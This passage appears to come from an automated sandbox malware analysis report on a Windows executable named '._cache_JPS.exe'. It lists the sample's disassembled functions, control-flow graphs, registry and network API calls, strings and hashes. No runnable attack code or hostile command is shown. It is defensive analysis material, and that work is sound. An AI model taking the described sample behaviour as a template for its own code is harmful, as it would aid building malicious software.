                                                                                                                                                        • 74D51560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AD7789
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD77D2
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD77D9
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 00AD7804
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$FileInfoVersion$D51560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                        • API String ID: 2805241234-1459072770
                                                                                                                                                        • Opcode ID: fa9177d6ec1a3bc5b725e6d56578c3c132e1dc4c6f372efde90e47ba0e6b5617
                                                                                                                                                        • Instruction ID: c1ae0c8fe00f94410c354f565a7dc03c1429377885b31d652f39c0fd4fbef962
                                                                                                                                                        • Opcode Fuzzy Hash: fa9177d6ec1a3bc5b725e6d56578c3c132e1dc4c6f372efde90e47ba0e6b5617
                                                                                                                                                        • Instruction Fuzzy Hash: 40410172A04200BAEB05A7749D47EFF7BECEF15720F44049AF805E3193FB649A40A7A1
                                                                                                                                                        Function 00A91F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 608 a91f04-a91f9c call a92d1a * 2 call a9c935 * 2 call a97e53 call a9d3d2 * 3 625 b02569-b02575 call ab2626 608->625 626 a91fa2-a91fa6 608->626 629 b0257d-b02583 call ace4ea 625->629 628 a91fac-a91faf 626->628 626->629 631 a91fb5-a91fb8 628->631 632 b0258f-b0259b call a9a4f6 628->632 629->632 631->632 634 a91fbe-a91fc7 GetForegroundWindow call a9200a 631->634 640 b025a1-b025b1 call a9a4f6 632->640 641 b02899-b0289d 632->641 639 a91fcc-a91fe3 call a9197e 634->639 654 a91fe4-a92007 call a95cd3 * 3 639->654 640->641 653 b025b7-b025c5 640->653 643 b028ab-b028ae 641->643 644 b0289f-b028a6 call a9c935 641->644 648 b028b0 643->648 649 b028b7-b028c4 643->649 644->643 648->649 651 b028d6-b028da 649->651 652 b028c6-b028d4 call a9b8a7 CharUpperBuffW 649->652 657 b028f1-b028fa 651->657 658 b028dc-b028df 651->658 652->651 656 b025c9-b025e1 call acd68d 653->656 656->641 670 b025e7-b025f7 call aaf885 656->670 663 b0290b EnumWindows 657->663 664 b028fc-b02909 GetDesktopWindow EnumChildWindows 657->664 658->657 662 b028e1-b028ef call a9b8a7 CharUpperBuffW 658->662 662->657 668 b02911-b02930 call ace44e call a92d1a 663->668 664->668 683 b02940 668->683 684 b02932-b0293b call a9200a 668->684 680 b0287b-b0288b call aaf885 670->680 681 b025fd-b0260d call aaf885 670->681 690 b02873-b02876 680->690 691 b0288d-b02891 680->691 692 b02861-b02871 call aaf885 681->692 693 b02613-b02623 call aaf885 681->693 684->683 691->654 695 b02897 691->695 692->690 700 b02842-b02848 GetForegroundWindow 692->700 701 b02629-b02639 call aaf885 693->701 702 b0281d-b02836 call ad88a2 IsWindow 693->702 698 b02852-b02858 695->698 698->692 704 b02849-b02850 call a9200a 700->704 709 b02659-b02669 call aaf885 701->709 710 b0263b-b02640 701->710 702->654 711 b0283c-b02840 702->711 704->698 720 b0267a-b0268a call aaf885 709->720 721 b0266b-b02675 709->721 713 b02646-b02657 call a95cf6 710->713 714 b0280d-b0280f 710->714 711->704 722 b0269b-b026a7 call a95be9 713->722 717 b02817-b02818 714->717 717->654 729 b026b5-b026c5 call aaf885 720->729 730 b0268c-b02698 call a95cf6 720->730 723 b027e6-b027f0 call a9c935 721->723 732 b02811-b02813 722->732 733 b026ad-b026b0 722->733 736 b02804-b02808 723->736 739 b026e3-b026f3 call aaf885 729->739 740 b026c7-b026de call ab2241 729->740 730->722 732->717 733->736 736->656 745 b02711-b02721 call aaf885 739->745 746 b026f5-b0270c call ab2241 739->746 740->736 751 b02723-b0273a call ab2241 745->751 752 b0273f-b0274f call aaf885 745->752 746->736 751->736 757 b02751-b02768 call ab2241 752->757 758 b0276d-b0277d call aaf885 752->758 757->736 763 b02795-b027a5 call aaf885 758->763 764 b0277f-b02793 call ab2241 758->764 769 b027c3-b027d3 call aaf885 763->769 770 b027a7-b027b7 call aaf885 763->770 764->736 776 b027f2-b02802 call acd614 769->776 777 b027d5-b027da 769->777 770->690 775 b027bd-b027c1 770->775 775->736 776->690 776->736 779 b02815 777->779 780 b027dc-b027e2 777->780 779->717 780->723
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00A91FBE
                                                                                                                                                        • IsWindow.USER32(?), ref: 00B0282E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Foreground_memmove
                                                                                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                        • API String ID: 3828923867-1919597938
                                                                                                                                                        • Opcode ID: 6a1f3ee38216110982b31ba3f4ce484c62379ca22c2576973d0820962d10d1ab
                                                                                                                                                        • Instruction ID: 9d9c4a616f55bc4849d6beca5cf400487b703e3b20444314231a57237de80e65
                                                                                                                                                        • Opcode Fuzzy Hash: 6a1f3ee38216110982b31ba3f4ce484c62379ca22c2576973d0820962d10d1ab
                                                                                                                                                        • Instruction Fuzzy Hash: C9D10730604702DFCB08EF60C985AAABBE5FF58344F148A6DF456571E2CB30E959DB92
                                                                                                                                                        Function 00AF352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 782 af352a-af3569 call a9d3d2 * 3 789 af356b-af356e 782->789 790 af3574-af35e7 call a984a6 call af3d7b call af3af7 782->790 789->790 791 af35f9-af360d call aa2570 789->791 804 af35e9-af35f4 call add7e4 790->804 805 af3612-af3617 790->805 798 af3a94-af3ab7 call a95cd3 * 3 791->798 804->791 808 af366d 805->808 809 af3619-af362e RegConnectRegistryW 805->809 811 af3671-af369c RegCreateKeyExW 808->811 812 af3667-af366b 809->812 813 af3630-af3662 call a97ba9 call add7e4 call aa2570 809->813 815 af369e-af36d2 call a97ba9 call add7e4 call aa2570 811->815 816 af36e7-af36ec 811->816 812->811 813->798 815->798 840 af36d8-af36e2 RegCloseKey 815->840 820 af3a7b-af3a8c RegCloseKey 816->820 821 af36f2-af3715 call a984a6 call ab1bc7 816->821 820->798 825 af3a8e-af3a92 RegCloseKey 820->825 835 af3717-af376d call a984a6 call ab18fb call a984a6 * 2 RegSetValueExW 821->835 836 af3796-af37b6 call a984a6 call ab1bc7 821->836 825->798 835->820 861 af3773-af3791 call a97ba9 call aa2570 835->861 847 af37bc-af3814 call a984a6 call ab18fb call a984a6 * 2 RegSetValueExW 836->847 848 af3840-af3860 call a984a6 call ab1bc7 836->848 840->798 847->820 878 af381a-af383b call a97ba9 call aa2570 847->878 862 af3949-af3969 call a984a6 call ab1bc7 848->862 863 af3866-af38c9 call a984a6 call ab010a call a984a6 call a93b1e 848->863 879 af3a74 861->879 883 af396b-af398b call a9cdb4 call a984a6 862->883 884 af39c6-af39e6 call a984a6 call ab1bc7 862->884 898 af38cb-af38d0 863->898 899 af38e9-af3918 call a984a6 RegSetValueExW 863->899 878->820 879->820 907 af398d-af39a1 RegSetValueExW 883->907 904 af39e8-af3a0e call a9d00b call a984a6 884->904 905 af3a13-af3a30 call a984a6 call ab1bc7 884->905 902 af38d8-af38db 898->902 903 af38d2-af38d4 898->903 915 af393d-af3944 call ab017e 899->915 916 af391a-af3936 call a97ba9 call aa2570 899->916 902->898 908 af38dd-af38df 902->908 903->902 904->907 929 af3a67-af3a71 call aa2570 905->929 930 af3a32-af3a60 call adbe47 call a984a6 call adbe8a 905->930 907->820 912 af39a7-af39c1 call a97ba9 call aa2570 907->912 908->899 913 af38e1-af38e5 908->913 912->879 913->899 915->820 916->915 929->879 930->929
                                                                                                                                                        APIs
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF3626
                                                                                                                                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,00B2DBF0,00000000,?,00000000,?,?), ref: 00AF3694
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00AF36DC
                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00AF3765
                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AF3A85
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AF3A92
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                        • API String ID: 536824911-966354055
                                                                                                                                                        • Opcode ID: e8f30fd4d7c63d78789b501b2b66514679bf52426e5986d44aaf4b176d09a4ec
                                                                                                                                                        • Instruction ID: 2f6274cb70e81f48cf5cd6fcdace61ae6e64704d4e7403eb4f4ecee6f2010824
                                                                                                                                                        • Opcode Fuzzy Hash: e8f30fd4d7c63d78789b501b2b66514679bf52426e5986d44aaf4b176d09a4ec
                                                                                                                                                        • Instruction Fuzzy Hash: B4027C756006019FCB14EF69CA95E2AB7E4FF89320F05845DF98A9B362DB34ED41CB81
                                                                                                                                                        Function 00A94257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,00000000,00000001,00000000), ref: 00A9428C
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00AB1BC7: __wcsicmp_l.LIBCMT ref: 00AB1C50
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00A943C0
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00B0214E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_JPS.exe$CMDLINE$CMDLINERAW
                                                                                                                                                        • API String ID: 861526374-1552997918
                                                                                                                                                        • Opcode ID: 52b20392320879c53799e6c2421c21de997ef0462872504da47e04ea28e4c4aa
                                                                                                                                                        • Instruction ID: 7ab24024dc9d33e4375585f4804edb2d9f92ac287a237e5488fe03c995ba4aab
                                                                                                                                                        • Opcode Fuzzy Hash: 52b20392320879c53799e6c2421c21de997ef0462872504da47e04ea28e4c4aa
                                                                                                                                                        • Instruction Fuzzy Hash: 01819072A00219AACF05EBE4DE56FEFBBF8AF45350F500455E501B7091EF606A09CBA1
                                                                                                                                                        Function 00AD78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1094 ad78ee-ad7911 WSAStartup 1095 ad7917-ad7938 gethostname gethostbyname 1094->1095 1096 ad79b1-ad79bd call ab1943 1094->1096 1095->1096 1097 ad793a-ad7941 1095->1097 1105 ad79be-ad79c1 1096->1105 1099 ad794e-ad7950 1097->1099 1100 ad7943 1097->1100 1103 ad7961-ad79a6 call aafaa0 inet_ntoa call ab3220 call ad8553 call ab1943 call ab017e 1099->1103 1104 ad7952-ad795f call ab1943 1099->1104 1102 ad7945-ad794c 1100->1102 1102->1099 1102->1102 1110 ad79a9-ad79af WSACleanup 1103->1110 1104->1110 1110->1105
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                        • API String ID: 208665112-3771769585
                                                                                                                                                        • Opcode ID: 874f683d361af72f7a6a5dbdc1c9e0357fb479877edd95d97ac505746f866bd1
                                                                                                                                                        • Instruction ID: ace51dd46e0381cf2b0c70c075fa069e7a63211f57119b308da9c39f2c102d8d
                                                                                                                                                        • Opcode Fuzzy Hash: 874f683d361af72f7a6a5dbdc1c9e0357fb479877edd95d97ac505746f866bd1
                                                                                                                                                        • Instruction Fuzzy Hash: 3D112432A08125AFCB29AB709D5AEEE37BCDF00720F4040A6F05692191FF70DF8086A0
                                                                                                                                                        Function 00AAE975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00AAEA39
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AAEA56
                                                                                                                                                          • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                                                                                                                                                        • _wcsncat.LIBCMT ref: 00AAEA69
                                                                                                                                                        • __makepath.LIBCMT ref: 00AAEA85
                                                                                                                                                          • Part of subcall function 00AB2BFF: __wmakepath_s.LIBCMT ref: 00AB2C13
                                                                                                                                                          • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                          • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AAEABE
                                                                                                                                                          • Part of subcall function 00AAEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00AAEADA,?,?), ref: 00AAEB27
                                                                                                                                                        • _wcscat.LIBCMT ref: 00B032FC
                                                                                                                                                        • _wcscat.LIBCMT ref: 00B03334
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 00B03370
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                        • String ID: Include$\
                                                                                                                                                        • API String ID: 1213536620-3429789819
                                                                                                                                                        • Opcode ID: 474dc52e951cb2003f99d87c4f608ae84b1de8f95fdc5edaaf90a7e280b8980a
                                                                                                                                                        • Instruction ID: df9b942c7c492a041602e724515807a1907081cb154c5bbd5e1bf1aaf36cb102
                                                                                                                                                        • Opcode Fuzzy Hash: 474dc52e951cb2003f99d87c4f608ae84b1de8f95fdc5edaaf90a7e280b8980a
                                                                                                                                                        • Instruction Fuzzy Hash: 97518FB24063409FC305EF68ED85E97B7ECFB4A301B40499EF54587261EF749644CB6A
                                                                                                                                                        Function 00A930A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A930B0
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00A930BF
                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00A930D5
                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00A930E7
                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00A930F9
                                                                                                                                                          • Part of subcall function 00A9318A: LoadImageW.USER32(00A90000,00000063,00000001,00000010,00000010,00000000), ref: 00A931AE
                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00A93167
                                                                                                                                                          • Part of subcall function 00A92F58: GetSysColorBrush.USER32(0000000F), ref: 00A92F8B
                                                                                                                                                          • Part of subcall function 00A92F58: RegisterClassExW.USER32(00000030), ref: 00A92FB5
                                                                                                                                                          • Part of subcall function 00A92F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00A92FC6
                                                                                                                                                          • Part of subcall function 00A92F58: LoadIconW.USER32(000000A9), ref: 00A93009
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                        • API String ID: 2880975755-4155596026
                                                                                                                                                        • Opcode ID: 516ece55583e47f459e0e68857938d4435b66c5060f176717bd3f46249d66021
                                                                                                                                                        • Instruction ID: 729980cb3a9e1ae1ec82ffbfa08d5b2eab4796f4edb33b59b8f4141928f330d0
                                                                                                                                                        • Opcode Fuzzy Hash: 516ece55583e47f459e0e68857938d4435b66c5060f176717bd3f46249d66021
                                                                                                                                                        • Instruction Fuzzy Hash: 54215EB1E00304ABCB00DFA9EC49B9DBFF5EB48311F1489AAE204A32E0DB7449408F91
                                                                                                                                                        Function 00AEB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
